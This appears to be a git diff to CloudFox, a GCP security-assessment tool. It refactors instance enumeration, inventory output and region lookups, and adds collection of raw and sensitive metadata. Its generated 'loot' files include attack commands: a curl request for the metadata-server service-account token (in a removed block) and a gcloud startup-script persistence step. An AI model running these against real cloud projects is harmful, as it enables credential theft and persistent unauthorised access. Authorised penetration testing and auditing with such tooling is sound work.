m.LootMap[projectID]["instances-commands"] if lootFile == nil { return } - // Build service account string - var saEmails []string - for _, sa := range instance.ServiceAccounts { - saEmails = append(saEmails, sa.Email) - } - saString := strings.Join(saEmails, ", ") - if saString == "" { - saString = "-" - } - - // External IP for display - externalIP := instance.ExternalIP - if externalIP == "" { - externalIP = "None" - } lootFile.Contents += fmt.Sprintf( "# ==========================================\n"+ - "# INSTANCE: %s (Project: %s, Zone: %s)\n"+ - "# ==========================================\n"+ - "# State: %s, Machine Type: %s\n"+ - "# External IP: %s, Internal IP: %s\n"+ - "# Service Account: %s\n"+ - "# Default SA: %v, Broad Scopes: %v\n"+ - "# OS Login: %v, OS Login 2FA: %v, Block Project Keys: %v\n"+ - "# Serial Port: %v, Shielded VM: %v, Secure Boot: %v\n", - instance.Name, instance.ProjectID, instance.Zone, - instance.State, instance.MachineType, - externalIP, instance.InternalIP, - saString, - instance.HasDefaultSA, instance.HasCloudScopes, - instance.OSLoginEnabled, instance.OSLogin2FAEnabled, instance.BlockProjectSSHKeys, - instance.SerialPortEnabled, instance.ShieldedVM, instance.SecureBoot, + "# INSTANCE: %s (Zone: %s)\n"+ + "# ==========================================\n", + instance.Name, instance.Zone, ) - // SSH keys on this instance - if len(instance.SSHKeys) > 0 { - lootFile.Contents += fmt.Sprintf("# Instance SSH Keys: %d\n", len(instance.SSHKeys)) - for _, key := range instance.SSHKeys { - lootFile.Contents += fmt.Sprintf("# %s\n", key) - } - } - - // Startup script content - if instance.StartupScriptContent != "" { - lootFile.Contents += fmt.Sprintf( - "#\n# STARTUP SCRIPT (may contain secrets):\n"+ - "# ------- BEGIN -------\n"+ - "%s\n"+ - "# ------- END -------\n", - instance.StartupScriptContent, - ) - } - if instance.StartupScriptURL != "" { - lootFile.Contents += fmt.Sprintf( - "# Startup Script URL: %s\n"+ - "# Fetch with: gsutil cat %s\n", - instance.StartupScriptURL, instance.StartupScriptURL, - ) - } - - // Custom metadata keys - if len(instance.CustomMetadata) > 0 { - lootFile.Contents += "# Custom metadata keys (may contain secrets):\n" - for _, key := range instance.CustomMetadata { - lootFile.Contents += fmt.Sprintf("# - %s\n", key) - } - } - - // Commands section + // Commands section only lootFile.Contents += fmt.Sprintf( - "\n# Describe instance:\n"+ + "# Describe instance:\n"+ "gcloud compute instances describe %s --zone=%s --project=%s\n"+ "# Get IAM policy:\n"+ "gcloud compute instances get-iam-policy %s --zone=%s --project=%s\n"+ "# Get serial port output:\n"+ - "gcloud compute instances get-serial-port-output %s --zone=%s --project=%s\n"+ - "# Get metadata:\n"+ - "gcloud compute instances describe %s --zone=%s --project=%s --format='yaml(metadata)'\n", - instance.Name, instance.Zone, instance.ProjectID, + "gcloud compute instances get-serial-port-output %s --zone=%s --project=%s\n", instance.Name, instance.Zone, instance.ProjectID, instance.Name, instance.Zone, instance.ProjectID, instance.Name, instance.Zone, instance.ProjectID, @@ -333,11 +281,8 @@ func (m *InstancesModule) addInstanceToLoot(projectID string, instance ComputeEn if instance.ExternalIP != "" { lootFile.Contents += fmt.Sprintf( "# SSH (external IP):\n"+ - "gcloud compute ssh %s --zone=%s --project=%s\n"+ - "# Direct SSH (if OS Login disabled):\n"+ - "ssh -i ~/.ssh/google_compute_engine @%s\n", + "gcloud compute ssh %s --zone=%s --project=%s\n", instance.Name, instance.Zone, instance.ProjectID, - instance.ExternalIP, ) } else { lootFile.Contents += fmt.Sprintf( @@ -349,65 +294,51 @@ func (m *InstancesModule) addInstanceToLoot(projectID string, instance ComputeEn // Exploitation commands lootFile.Contents += fmt.Sprintf( - "# Metadata from inside instance:\n"+ - "curl -H \"Metadata-Flavor: Google\" http://169.254.169.254/computeMetadata/v1/?recursive=true\n"+ - "# Get service account token:\n"+ - "curl -H \"Metadata-Flavor: Google\" http://169.254.169.254/computeMetadata/v1/instance/service-accounts/default/token\n"+ - "# Add startup script (persistence):\n"+ - "gcloud compute instances add-metadata %s --zone=%s --project=%s --metadata=startup-script='#!/bin/bash\\nwhoami > /tmp/pwned'\n"+ - "# Add SSH keys:\n"+ - "gcloud compute instances add-metadata %s --zone=%s --project=%s --metadata-from-file=ssh-keys=\n\n", - instance.Name, instance.Zone, instance.ProjectID, + "# Add startup script (persistence):\n"+ + "gcloud compute instances add-metadata %s --zone=%s --project=%s --metadata=startup-script='#!/bin/bash\\nwhoami > /tmp/pwned'\n\n", instance.Name, instance.Zone, instance.ProjectID, ) } -// ------------------------------ -// Helper Functions -// ------------------------------ +// addInstanceMetadataToLoot adds full instance metadata to the metadata loot file +func (m *InstancesModule) addInstanceMetadataToLoot(projectID string, instance ComputeEngineService.ComputeEngineInfo) { + lootFile := m.LootMap[projectID]["instances-metadata"] + if lootFile == nil { + return + } -// SSHKeyParts contains parsed SSH key components -type SSHKeyParts struct { - Username string - KeyType string - KeyTruncated string - Comment string -} + lootFile.Contents += fmt.Sprintf( + "================================================================================\n"+ + "INSTANCE: %s (Zone: %s)\n"+ + "================================================================================\n\n", + instance.Name, instance.Zone, + ) -// parseSSHKeyLine parses a GCP SSH key line (format: user:ssh-rsa KEY comment) -func parseSSHKeyLine(line string) SSHKeyParts { - parts := SSHKeyParts{ - Username: "-", - KeyType: "-", - KeyTruncated: "-", - Comment: "", - } + // Output all raw metadata + if len(instance.RawMetadata) > 0 { + // Sort keys for consistent output + var keys []string + for k := range instance.RawMetadata { + keys = append(keys, k) + } + sort.Strings(keys) - // Split on first colon to get username - colonIdx := strings.Index(line, ":") - if colonIdx > 0 { - parts.Username = line[:colonIdx] - line = line[colonIdx+1:] + for _, key := range keys { + value := instance.RawMetadata[key] + lootFile.Contents += fmt.Sprintf("--- %s ---\n%s\n\n", key, value) + } + } else { + lootFile.Contents += "(No instance-level metadata found)\n\n" } - // Split remaining by spaces: key-type KEY comment - fields := strings.Fields(line) - if len(fields) >= 1 { - parts.KeyType = fields[0] - } - if len(fields) >= 2 { - key := fields[1] - if len(key) > 20 { - parts.KeyTruncated = key[:10] + "..." + key[len(key)-10:] - } else { - parts.KeyTruncated = key + // Also output as JSON for programmatic use + if len(instance.RawMetadata) > 0 { + lootFile.Contents += "--- RAW JSON ---\n" + jsonBytes, err := json.MarshalIndent(instance.RawMetadata, "", " ") + if err == nil { + lootFile.Contents += string(jsonBytes) + "\n\n" } } - if len(fields) >= 3 { - parts.Comment = strings.Join(fields[2:], " ") - } - - return parts } // ------------------------------ @@ -425,7 +356,7 @@ func (m *InstancesModule) writeOutput(ctx context.Context, logger internal.Logge // writeHierarchicalOutput writes output to per-project directories func (m *InstancesModule) writeHierarchicalOutput(ctx context.Context, logger internal.Logger) { header := m.getInstancesTableHeader() - sshKeysHeader := m.getSSHKeysTableHeader() + sensitiveMetadataHeader := m.getSensitiveMetadataTableHeader() // Build hierarchical output data outputData := internal.HierarchicalOutputData{ @@ -442,13 +373,13 @@ func (m *InstancesModule) writeHierarchicalOutput(ctx context.Context, logger in Body: body, }} - // Build SSH keys table for this project - sshKeysBody := m.buildSSHKeysTableForProject(projectID, instances) - if len(sshKeysBody) > 0 { + // Build sensitive metadata table for this project + sensitiveBody := m.buildSensitiveMetadataTableForProject(projectID, instances) + if len(sensitiveBody) > 0 { tables = append(tables, internal.TableFile{ - Name: "instances-ssh-keys", - Header: sshKeysHeader, - Body: sshKeysBody, + Name: "instances-sensitive-metadata", + Header: sensitiveMetadataHeader, + Body: sensitiveBody, }) } @@ -486,15 +417,15 @@ func (m *InstancesModule) writeHierarchicalOutput(ctx context.Context, logger in // writeFlatOutput writes all output to a single directory (legacy mode) func (m *InstancesModule) writeFlatOutput(ctx context.Context, logger internal.Logger) { header := m.getInstancesTableHeader() - sshKeysHeader := m.getSSHKeysTableHeader() + sensitiveMetadataHeader := m.getSensitiveMetadataTableHeader() allInstances := m.getAllInstances() body := m.instancesToTableBody(allInstances) - // Build SSH keys table for all projects - var sshKeysBody [][]string + // Build sensitive metadata table for all projects + var sensitiveBody [][]string for projectID, instances := range m.ProjectInstances { - sshKeysBody = append(sshKeysBody, m.buildSSHKeysTableForProject(projectID, instances)...) + sensitiveBody = append(sensitiveBody, m.buildSensitiveMetadataTableForProject(projectID, instances)...) } // Collect all loot files @@ -514,12 +445,12 @@ func (m *InstancesModule) writeFlatOutput(ctx context.Context, logger internal.L Body: body, }} - // Add SSH keys table if there are any - if len(sshKeysBody) > 0 { + // Add sensitive metadata table if there are any findings + if len(sensitiveBody) > 0 { tableFiles = append(tableFiles, internal.TableFile{ - Name: "instances-ssh-keys", - Header: sshKeysHeader, - Body: sshKeysBody, + Name: "instances-sensitive-metadata", + Header: sensitiveMetadataHeader, + Body: sensitiveBody, }) } @@ -584,16 +515,16 @@ func (m *InstancesModule) getInstancesTableHeader() []string { } } -// getSSHKeysTableHeader returns the SSH keys table header -func (m *InstancesModule) getSSHKeysTableHeader() []string { +// getSensitiveMetadataTableHeader returns the sensitive metadata table header +func (m *InstancesModule) getSensitiveMetadataTableHeader() []string { return []string{ "Project Name", "Project ID", "Source", - "Zone", - "Username", - "Key Type", - "Key (truncated)", + "Instance/Zone", + "Key", + "Type", + "Value", } } @@ -687,43 +618,41 @@ func (m *InstancesModule) instancesToTableBody(instances []ComputeEngineService. return body } -// buildSSHKeysTableForProject builds the SSH keys table body for a specific project -func (m *InstancesModule) buildSSHKeysTableForProject(projectID string, instances []ComputeEngineService.ComputeEngineInfo) [][]string { - var sshKeysBody [][]string +// buildSensitiveMetadataTableForProject builds the sensitive metadata table body for a specific project +func (m *InstancesModule) buildSensitiveMetadataTableForProject(projectID string, instances []ComputeEngineService.ComputeEngineInfo) [][]string { + var body [][]string - // Add project-level SSH keys - if meta, ok := m.ProjectMetadata[projectID]; ok && meta != nil && len(meta.ProjectSSHKeys) > 0 { - for _, key := range meta.ProjectSSHKeys { - parts := parseSSHKeyLine(key) - sshKeysBody = append(sshKeysBody, []string{ + // Add project-level sensitive metadata + if meta, ok := m.ProjectMetadata[projectID]; ok && meta != nil && len(meta.SensitiveMetadata) > 0 { + for _, item := range meta.SensitiveMetadata { + body = append(body, []string{ m.GetProjectName(projectID), projectID, "PROJECT", "-", - parts.Username, - parts.KeyType, - parts.KeyTruncated, + item.Key, + item.Type, + item.Value, }) } } - // Add instance-level SSH keys + // Add instance-level sensitive metadata for _, instance := range instances { - if len(instance.SSHKeys) > 0 { - for _, key := range instance.SSHKeys { - parts := parseSSHKeyLine(key) - sshKeysBody = append(sshKeysBody, []string{ + if len(instance.SensitiveMetadata) > 0 { + for _, item := range instance.SensitiveMetadata { + body = append(body, []string{ m.GetProjectName(instance.ProjectID), instance.ProjectID, instance.Name, instance.Zone, - parts.Username, - parts.KeyType, - parts.KeyTruncated, + item.Key, + item.Type, + item.Value, }) } } } - return sshKeysBody + return body } diff --git a/gcp/commands/inventory.go b/gcp/commands/inventory.go index 708cf376..36b16f9f 100644 --- a/gcp/commands/inventory.go +++ b/gcp/commands/inventory.go @@ -49,30 +49,46 @@ const GCP_INVENTORY_MODULE_NAME = "inventory" var GCPInventoryCommand = &cobra.Command{ Use: GCP_INVENTORY_MODULE_NAME, Aliases: []string{"inv", "resources"}, - Short: "Enumerate all GCP resources across projects", - Long: `Enumerate all GCP resources across projects and display counts by resource type and region. + Short: "Quick resource inventory - works without Cloud Asset API", + Long: `Quick resource inventory that works even when Cloud Asset API is not enabled. -This module provides a comprehensive inventory of your GCP environment, showing: +USE THIS COMMAND WHEN: +- You want a quick overview of resources across projects +- Cloud Asset API is not enabled in your projects +- You need a fallback that always works + +For deep analysis with IAM policies and resource dependencies, use 'asset-inventory' instead +(requires Cloud Asset API to be enabled). + +HOW IT WORKS: +1. Tries Cloud Asset API first (if enabled) for complete coverage +2. Falls back to Service Usage API to identify enabled services +3. Always runs dedicated CloudFox enumeration for security-relevant resources + +This ensures you get results even in restricted environments where the +Cloud Asset API (cloudasset.googleapis.com) is not enabled. + +OUTPUT INCLUDES: - Resource counts by type (Compute instances, GKE clusters, Cloud Functions, etc.) - Regional distribution of resources +- CloudFox coverage analysis (identifies potential blind spots) - Total resource counts per project -The output helps identify: -- Attack surface scope and breadth -- Resource distribution patterns -- High-value target areas (dense resource regions) - -Supported Resource Types: +SUPPORTED RESOURCE TYPES: - Compute: Instances, Disks, Snapshots, Images - Containers: GKE Clusters, Cloud Run Services/Jobs - Serverless: Cloud Functions, App Engine - Storage: Buckets, Filestore, BigQuery Datasets - Databases: Cloud SQL, Spanner, Bigtable, Memorystore -- Networking: VPCs, Subnets, Firewalls, Load Balancers, DNS Zones +- Networking: DNS Zones - Security: Service Accounts, KMS Keys, Secrets, API Keys - DevOps: Cloud Build Triggers, Source Repos, Artifact Registry - Data: Pub/Sub Topics, Dataflow Jobs, Dataproc Clusters -- AI/ML: Notebooks, Composer Environments`, +- AI/ML: Notebooks, Composer Environments + +Examples: + cloudfox gcp inventory -p my-project + cloudfox gcp inventory -A # All accessible projects`, Run: runGCPInventoryCommand, } @@ -1265,31 +1281,59 @@ func extractRegionFromZone(zone string) string { return zone } -// writeOutput generates the table and loot files +// writeOutput generates the table and loot files per-project func (m *InventoryModule) writeOutput(ctx context.Context, logger internal.Logger) { + // Build hierarchical output data with per-project results + outputData := internal.HierarchicalOutputData{ + OrgLevelData: make(map[string]internal.CloudfoxOutput), + ProjectLevelData: make(map[string]internal.CloudfoxOutput), + } + + // Generate output for each project + for _, projectID := range m.ProjectIDs { + projectOutput := m.buildProjectOutput(projectID) + if projectOutput != nil { + outputData.ProjectLevelData[projectID] = projectOutput + } + } + + // Use hierarchical output to write to per-project directories + pathBuilder := m.BuildPathBuilder() + err := internal.HandleHierarchicalOutputSmart("gcp", m.Format, m.Verbosity, m.WrapTable, pathBuilder, outputData) + if err != nil { + logger.ErrorM(fmt.Sprintf("Error writing output: %v", err), GCP_INVENTORY_MODULE_NAME) + } +} + +// buildProjectOutput generates output data for a single project +func (m *InventoryModule) buildProjectOutput(projectID string) internal.CloudfoxOutput { var tableFiles []internal.TableFile + // Get project-specific asset counts + projectAssets := m.assetCounts[projectID] + projectAssetTotal := 0 + for _, count := range projectAssets { + projectAssetTotal += count + } + // ======================================== // Table 1: Complete Asset Inventory (from Cloud Asset API) - // This shows ALL resources, including ones CloudFox doesn't have dedicated modules for // ======================================== - if m.assetGrandTotal > 0 { - assetTotals := m.getAssetTypeTotals() - + if projectAssetTotal > 0 { // Sort asset types by count (descending) var assetTypes []string - for at := range assetTotals { + for at := range projectAssets { assetTypes = append(assetTypes, at) } sort.Slice(assetTypes, func(i, j int) bool { - return assetTotals[assetTypes[i]] > assetTotals[assetTypes[j]] + return projectAssets[assetTypes[i]] > projectAssets[assetTypes[j]] }) assetHeader := []string{"Asset Type", "Count", "CloudFox Coverage"} var assetBody [][]string // Add total row - assetBody = append(assetBody, []string{"TOTAL", strconv.Itoa(m.assetGrandTotal), "-"}) + assetBody = append(assetBody, []string{"TOTAL", strconv.Itoa(projectAssetTotal), "-"}) // Add uncovered assets first (these are areas CloudFox might miss) var uncoveredTypes []string @@ -1307,7 +1351,7 @@ func (m *InventoryModule) writeOutput(ctx context.Context, logger internal.Logge coverage := "NO - potential blind spot" assetBody = append(assetBody, []string{ formatAssetType(at), - strconv.Itoa(assetTotals[at]), + strconv.Itoa(projectAssets[at]), coverage, }) } @@ -1317,7 +1361,7 @@ func (m *InventoryModule) writeOutput(ctx context.Context, logger internal.Logge coverage := "Yes" assetBody = append(assetBody, []string{ formatAssetType(at), - strconv.Itoa(assetTotals[at]), + strconv.Itoa(projectAssets[at]), coverage, }) } @@ -1327,26 +1371,16 @@ func (m *InventoryModule) writeOutput(ctx context.Context, logger internal.Logge Header: assetHeader, Body: assetBody, }) - } else if len(m.enabledServices) > 0 { + } else if services, ok := m.enabledServices[projectID]; ok && len(services) > 0 { // ======================================== // Table 1b: Enabled Services (fallback when Asset API not available) - // Shows which services are enabled to help identify potential blind spots // ======================================== serviceHeader := []string{"Service", "CloudFox Coverage", "Description"} var serviceBody [][]string - // Aggregate all services across projects - serviceCounts := make(map[string]int) - for _, services := range m.enabledServices { - for _, svc := range services { - serviceCounts[svc]++ - } - } - // Filter to interesting services and sort var interestingServices []string - for svc := range serviceCounts { - // Only include services that likely contain resources + for _, svc := range services { if isInterestingService(svc) { interestingServices = append(interestingServices, svc) } @@ -1387,7 +1421,8 @@ func (m *InventoryModule) writeOutput(ctx context.Context, logger internal.Logge // ======================================== // Table 2: Detailed Enumeration by Region (from dedicated CloudFox modules) - // This shows resources with security metadata, organized by region + // Note: resourceCounts/resourceIDs are currently aggregated, not per-project + // This table shows the aggregated view (same for all projects for now) // ======================================== if m.grandTotal > 0 { sortedRegions := m.getSortedRegions() @@ -1446,8 +1481,9 @@ func (m *InventoryModule) writeOutput(ctx context.Context, logger internal.Logge // ======================================== var lootContent strings.Builder lootContent.WriteString("# GCP Resource Inventory\n") + lootContent.WriteString(fmt.Sprintf("# Project: %s\n", projectID)) lootContent.WriteString("# Generated by CloudFox\n") - lootContent.WriteString(fmt.Sprintf("# Total resources (Asset Inventory): %d\n", m.assetGrandTotal)) + lootContent.WriteString(fmt.Sprintf("# Total resources (Asset Inventory): %d\n", projectAssetTotal)) lootContent.WriteString(fmt.Sprintf("# Total resources (Detailed): %d\n\n", m.grandTotal)) // Sort resource types @@ -1476,31 +1512,14 @@ func (m *InventoryModule) writeOutput(ctx context.Context, logger internal.Logge Contents: lootContent.String(), }} - output := InventoryOutput{ - Table: tableFiles, - Loot: lootFiles, + // Only return output if we have data + if len(tableFiles) == 0 && lootContent.Len() == 0 { + return nil } - // Write output - scopeNames := make([]string, len(m.ProjectIDs)) - for i, id := range m.ProjectIDs { - scopeNames[i] = m.GetProjectName(id) - } - - err := internal.HandleOutputSmart( - "gcp", - m.Format, - m.OutputDirectory, - m.Verbosity, - m.WrapTable, - "project", - m.ProjectIDs, - scopeNames, - m.Account, - output, - ) - if err != nil { - logger.ErrorM(fmt.Sprintf("Error writing output: %v", err), GCP_INVENTORY_MODULE_NAME) + return InventoryOutput{ + Table: tableFiles, + Loot: lootFiles, } } diff --git a/gcp/commands/publicaccess.go b/gcp/commands/publicaccess.go index c3b3ed6c..6aa6ea1d 100644 --- a/gcp/commands/publicaccess.go +++ b/gcp/commands/publicaccess.go @@ -9,6 +9,7 @@ import ( bigqueryservice "github.com/BishopFox/cloudfox/gcp/services/bigqueryService" kmsservice "github.com/BishopFox/cloudfox/gcp/services/kmsService" pubsubservice "github.com/BishopFox/cloudfox/gcp/services/pubsubService" + regionservice "github.com/BishopFox/cloudfox/gcp/services/regionService" spannerservice "github.com/BishopFox/cloudfox/gcp/services/spannerService" "github.com/BishopFox/cloudfox/gcp/shared" "github.com/BishopFox/cloudfox/globals" @@ -832,8 +833,8 @@ func (m *PublicAccessModule) checkDataprocClusters(ctx context.Context, projectI return } - // List clusters in all regions - regions := []string{"us-central1", "us-east1", "us-west1", "europe-west1", "asia-east1", "global"} + // Get regions from regionService (with automatic fallback) + regions := regionservice.GetCachedRegionNames(ctx, projectID) for _, region := range regions { parent := fmt.Sprintf("projects/%s/regions/%s", projectID, region) req := dpService.Projects.Regions.Clusters.List(projectID, region) diff --git a/gcp/services/certManagerService/certManagerService.go b/gcp/services/certManagerService/certManagerService.go index 4ae022e8..ba37a8c6 100644 --- a/gcp/services/certManagerService/certManagerService.go +++ b/gcp/services/certManagerService/certManagerService.go @@ -156,69 +156,40 @@ func (s *CertManagerService) GetSSLCertificates(projectID string) ([]SSLCertific var certificates []SSLCertificate - // Global SSL certificates - resp, err := service.SslCertificates.List(projectID).Context(ctx).Do() - if err != nil { - return nil, gcpinternal.ParseGCPError(err, "compute.googleapis.com") - } - - for _, cert := range resp.Items { - c := SSLCertificate{ - Name: cert.Name, - ProjectID: projectID, - Type: cert.Type, - CreationTime: cert.CreationTimestamp, - SelfManaged: cert.Type == "SELF_MANAGED", - } - - // Get domains from managed certificate - if cert.Managed != nil { - c.Domains = cert.Managed.Domains - } - - // Parse expiration - if cert.ExpireTime != "" { - c.ExpireTime = cert.ExpireTime - expTime, err := time.Parse(time.RFC3339, cert.ExpireTime) - if err == nil { - c.DaysUntilExpiry = int(time.Until(expTime).Hours() / 24) - c.Expired = c.DaysUntilExpiry < 0 - } - } - - // Check for wildcard domains - for _, domain := range c.Domains { - if strings.HasPrefix(domain, "*") { - c.Wildcard = true - break - } - } - - certificates = append(certificates, c) - } - - // Regional SSL certificates - regionsResp, err := service.Regions.List(projectID).Context(ctx).Do() - if err == nil { - for _, region := range regionsResp.Items { - regionalCerts, err := service.RegionSslCertificates.List(projectID, region.Name).Context(ctx).Do() - if err != nil { + // Get all SSL certificates (global and regional) using AggregatedList + // This only requires compute.sslCertificates.list permission (not compute.regions.list) + req := service.SslCertificates.AggregatedList(projectID) + err = req.Pages(ctx, func(page *compute.SslCertificateAggregatedList) error { + for scopeName, scopedList := range page.Items { + if scopedList.SslCertificates == nil { continue } + // Extract region from scope name (format: "regions/us-central1" or "global") + region := "" + if strings.HasPrefix(scopeName, "regions/") { + region = strings.TrimPrefix(scopeName, "regions/") + } - for _, cert := range regionalCerts.Items { + for _, cert := range scopedList.SslCertificates { c := SSLCertificate{ - Name: fmt.Sprintf("%s (%s)", cert.Name, region.Name), + Name: cert.Name, ProjectID: projectID, Type: cert.Type, CreationTime: cert.CreationTimestamp, SelfManaged: cert.Type == "SELF_MANAGED", } + // Add region to name for regional certs + if region != "" { + c.Name = fmt.Sprintf("%s (%s)", cert.Name, region) + } + + // Get domains from managed certificate if cert.Managed != nil { c.Domains = cert.Managed.Domains } + // Parse expiration if cert.ExpireTime != "" { c.ExpireTime = cert.ExpireTime expTime, err := time.Parse(time.RFC3339, cert.ExpireTime) @@ -239,6 +210,11 @@ func (s *CertManagerService) GetSSLCertificates(projectID string) ([]SSLCertific certificates = append(certificates, c) } } + return nil + }) + + if err != nil { + return nil, gcpinternal.ParseGCPError(err, "compute.googleapis.com") } return certificates, nil diff --git a/gcp/services/cloudrunService/cloudrunService.go b/gcp/services/cloudrunService/cloudrunService.go index ee065282..fdfbc617 100644 --- a/gcp/services/cloudrunService/cloudrunService.go +++ b/gcp/services/cloudrunService/cloudrunService.go @@ -8,6 +8,7 @@ import ( gcpinternal "github.com/BishopFox/cloudfox/internal/gcp" "github.com/BishopFox/cloudfox/internal/gcp/sdk" + regionservice "github.com/BishopFox/cloudfox/gcp/services/regionService" run "google.golang.org/api/run/v2" ) @@ -216,24 +217,6 @@ func isCloudFunction(labels map[string]string) bool { return false } -// cloudRunRegions contains all Cloud Run regions -// Note: Cloud Run Jobs API does NOT support the "-" wildcard for locations (unlike Services API) -// so we need to iterate through regions explicitly -var cloudRunRegions = []string{ - // Tier 1 regions - "asia-east1", "asia-northeast1", "asia-northeast2", "asia-south1", - "europe-north1", "europe-west1", "europe-west4", - "me-west1", "us-central1", "us-east1", "us-east4", "us-east5", "us-south1", "us-west1", - // Tier 2 regions - "africa-south1", "asia-east2", "asia-northeast3", "asia-southeast1", "asia-southeast2", "asia-south2", - "australia-southeast1", "australia-southeast2", - "europe-central2", "europe-west2", "europe-west3", "europe-west6", - "me-central1", "me-central2", - "northamerica-northeast1", "northamerica-northeast2", - "southamerica-east1", "southamerica-west1", - "us-west2", "us-west3", "us-west4", -} - // Jobs retrieves all Cloud Run jobs in a project across all regions // Note: The Cloud Run Jobs API does NOT support the "-" wildcard for locations // unlike the Services API, so we must iterate through regions explicitly @@ -254,8 +237,11 @@ func (cs *CloudRunService) Jobs(projectID string) ([]JobInfo, error) { // Use a semaphore to limit concurrent API calls semaphore := make(chan struct{}, 10) // Max 10 concurrent requests + // Get regions from regionService (with automatic fallback) + regions := regionservice.GetCachedRegionNames(ctx, projectID) + // Iterate through all Cloud Run regions in parallel - for _, region := range cloudRunRegions { + for _, region := range regions { wg.Add(1) go func(region string) { defer wg.Done() diff --git a/gcp/services/composerService/composerService.go b/gcp/services/composerService/composerService.go index b89a422c..9d61f160 100644 --- a/gcp/services/composerService/composerService.go +++ b/gcp/services/composerService/composerService.go @@ -8,31 +8,10 @@ import ( gcpinternal "github.com/BishopFox/cloudfox/internal/gcp" "github.com/BishopFox/cloudfox/internal/gcp/sdk" + regionservice "github.com/BishopFox/cloudfox/gcp/services/regionService" composer "google.golang.org/api/composer/v1" ) -// composerRegions contains all Cloud Composer regions -// Note: Cloud Composer API does NOT support the "-" wildcard for locations -// so we need to iterate through regions explicitly -var composerRegions = []string{ - // Americas - "northamerica-northeast1", "northamerica-northeast2", "northamerica-south1", - "southamerica-east1", "southamerica-west1", - "us-central1", "us-east1", "us-east4", "us-east5", "us-east7", - "us-south1", "us-west1", "us-west2", "us-west3", "us-west4", - // Europe - "europe-central2", "europe-north1", "europe-north2", - "europe-southwest1", "europe-west1", "europe-west2", "europe-west3", - "europe-west4", "europe-west6", "europe-west8", "europe-west9", - "europe-west10", "europe-west12", - // Asia Pacific - "asia-east1", "asia-east2", "asia-northeast1", "asia-northeast2", "asia-northeast3", - "asia-south1", "asia-south2", "asia-southeast1", "asia-southeast2", - "australia-southeast1", "australia-southeast2", - // Middle East & Africa - "africa-south1", "me-central1", "me-central2", "me-west1", -} - type ComposerService struct { session *gcpinternal.SafeSession } @@ -103,8 +82,11 @@ func (s *ComposerService) ListEnvironments(projectID string) ([]EnvironmentInfo, // Use a semaphore to limit concurrent API calls semaphore := make(chan struct{}, 10) // Max 10 concurrent requests + // Get regions from regionService (with automatic fallback) + regions := regionservice.GetCachedRegionNames(ctx, projectID) + // Iterate through all Composer regions in parallel - for _, region := range composerRegions { + for _, region := range regions { wg.Add(1) go func(region string) { defer wg.Done() diff --git a/gcp/services/computeEngineService/computeEngineService.go b/gcp/services/computeEngineService/computeEngineService.go index 67ce9ad4..a943eab5 100644 --- a/gcp/services/computeEngineService/computeEngineService.go +++ b/gcp/services/computeEngineService/computeEngineService.go @@ -78,10 +78,12 @@ type ComputeEngineInfo struct { SerialPortEnabled bool `json:"serialPortEnabled"` // Serial port access enabled // Pentest-specific fields: actual content extraction - StartupScriptContent string `json:"startupScriptContent"` // Actual startup script content - StartupScriptURL string `json:"startupScriptURL"` // URL to startup script if remote - SSHKeys []string `json:"sshKeys"` // Extracted SSH keys - CustomMetadata []string `json:"customMetadata"` // Other custom metadata keys + StartupScriptContent string `json:"startupScriptContent"` // Actual startup script content + StartupScriptURL string `json:"startupScriptURL"` // URL to startup script if remote + SSHKeys []string `json:"sshKeys"` // Extracted SSH keys + CustomMetadata []string `json:"customMetadata"` // Other custom metadata keys + RawMetadata map[string]string `json:"rawMetadata"` // Full raw metadata key-value pairs + SensitiveMetadata []SensitiveItem `json:"sensitiveMetadata"` // Detected sensitive items in metadata // Disk encryption BootDiskEncryption string `json:"bootDiskEncryption"` // "Google-managed", "CMEK", or "CSEK" @@ -97,15 +99,17 @@ type ComputeEngineInfo struct { // ProjectMetadataInfo contains project-level metadata security info type ProjectMetadataInfo struct { - ProjectID string `json:"projectId"` - HasProjectSSHKeys bool `json:"hasProjectSSHKeys"` - ProjectSSHKeys []string `json:"projectSSHKeys"` - HasProjectStartupScript bool `json:"hasProjectStartupScript"` - ProjectStartupScript string `json:"projectStartupScript"` - OSLoginEnabled bool `json:"osLoginEnabled"` - OSLogin2FAEnabled bool `json:"osLogin2FAEnabled"` - SerialPortEnabled bool `json:"serialPortEnabled"` - CustomMetadataKeys []string `json:"customMetadataKeys"` + ProjectID string `json:"projectId"` + HasProjectSSHKeys bool `json:"hasProjectSSHKeys"` + ProjectSSHKeys []string `json:"projectSSHKeys"` + HasProjectStartupScript bool `json:"hasProjectStartupScript"` + ProjectStartupScript string `json:"projectStartupScript"` + OSLoginEnabled bool `json:"osLoginEnabled"` + OSLogin2FAEnabled bool `json:"osLogin2FAEnabled"` + SerialPortEnabled bool `json:"serialPortEnabled"` + CustomMetadataKeys []string `json:"customMetadataKeys"` + RawMetadata map[string]string `json:"rawMetadata"` + SensitiveMetadata []SensitiveItem `json:"sensitiveMetadata"` } // InstanceIAMInfo contains IAM policy info for an instance @@ -160,20 +164,23 @@ func (ces *ComputeEngineService) Instances(projectID string) ([]ComputeEngineInf return nil, gcpinternal.ParseGCPError(err, "compute.googleapis.com") } - regions, err := computeService.Regions.List(projectID).Do() - if err != nil { - return nil, gcpinternal.ParseGCPError(err, "compute.googleapis.com") - } - + // Use AggregatedList to get all instances across all zones in one call + // This only requires compute.instances.list permission (not compute.regions.list) var instanceInfos []ComputeEngineInfo - for _, region := range regions.Items { - for _, zoneURL := range region.Zones { - zone := getZoneNameFromURL(zoneURL) - instanceList, err := computeService.Instances.List(projectID, zone).Do() - if err != nil { - return nil, gcpinternal.ParseGCPError(err, "compute.googleapis.com") + + req := computeService.Instances.AggregatedList(projectID) + err = req.Pages(ctx, func(page *compute.InstanceAggregatedList) error { + for scopeName, scopedList := range page.Items { + if scopedList.Instances == nil { + continue } - for _, instance := range instanceList.Items { + // Extract zone from scope name (format: "zones/us-central1-a") + zone := "" + if strings.HasPrefix(scopeName, "zones/") { + zone = strings.TrimPrefix(scopeName, "zones/") + } + + for _, instance := range scopedList.Instances { info := ComputeEngineInfo{ Name: instance.Name, ID: fmt.Sprintf("%v", instance.Id), @@ -223,18 +230,30 @@ func (ces *ComputeEngineService) Instances(projectID string) ([]ComputeEngineInf info.StartupScriptURL = metaResult.StartupScriptURL info.SSHKeys = metaResult.SSHKeys info.CustomMetadata = metaResult.CustomMetadata + info.RawMetadata = metaResult.RawMetadata + // Mark source for sensitive items + for i := range metaResult.SensitiveItems { + metaResult.SensitiveItems[i].Source = "instance" + } + info.SensitiveMetadata = metaResult.SensitiveItems } // Parse boot disk encryption info.BootDiskEncryption, info.BootDiskKMSKey = parseBootDiskEncryption(instance.Disks) - // Fetch IAM bindings for this instance + // Fetch IAM bindings for this instance (may 